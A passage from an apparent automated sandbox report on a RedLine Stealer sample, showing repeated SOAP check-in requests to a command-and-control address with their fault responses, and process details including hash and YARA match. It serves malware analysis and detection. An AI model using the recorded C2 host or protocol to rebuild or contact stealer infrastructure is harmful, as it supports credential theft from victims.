20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:10:02.093358040 CEST10705OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:10:02.163235903 CEST10706INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:10:02.234370947 CEST10707INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:10:01 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:10:03.249944925 CEST10707OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:10:03.319885969 CEST10707INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:10:03.394078970 CEST10708INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:10:02 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:10:04.406392097 CEST10708OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:10:04.480132103 CEST10709INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:10:04.550064087 CEST10710INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:10:04 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>


                                  Code Manipulations

                                  Statistics

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Start time:23:08:04
                                  Start date:03/08/2021
                                  Path:C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                                  Wow64 process (32bit):true
                                  Commandline:'C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe'
                                  Imagebase:0x5a0000
                                  File size:364240 bytes
                                  MD5 hash:2E18A08987838BBC3C26FFDBBCEC1E62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.223233962.000000000393A000.00000004.00000001.sdmp, Author: Joe Security
                                  Reputation:low

                                  General

                                  Start time:23:08:16
                                  Start date:03/08/2021
                                  Path:C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Users\user\Desktop\7C3BEB3D9B0A8E0BDC6344A24B3B527B96CB9C845AA68.exe
                                  Imagebase:0x8b0000
                                  File size:364240 bytes
                                  MD5 hash:2E18A08987838BBC3C26FFDBBCEC1E62
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:.Net C# or VB.NET
                                  Yara matches:
                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.465623603.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                  Reputation:low

                                  Disassembly

                                  Code Analysis

                                  Reset < >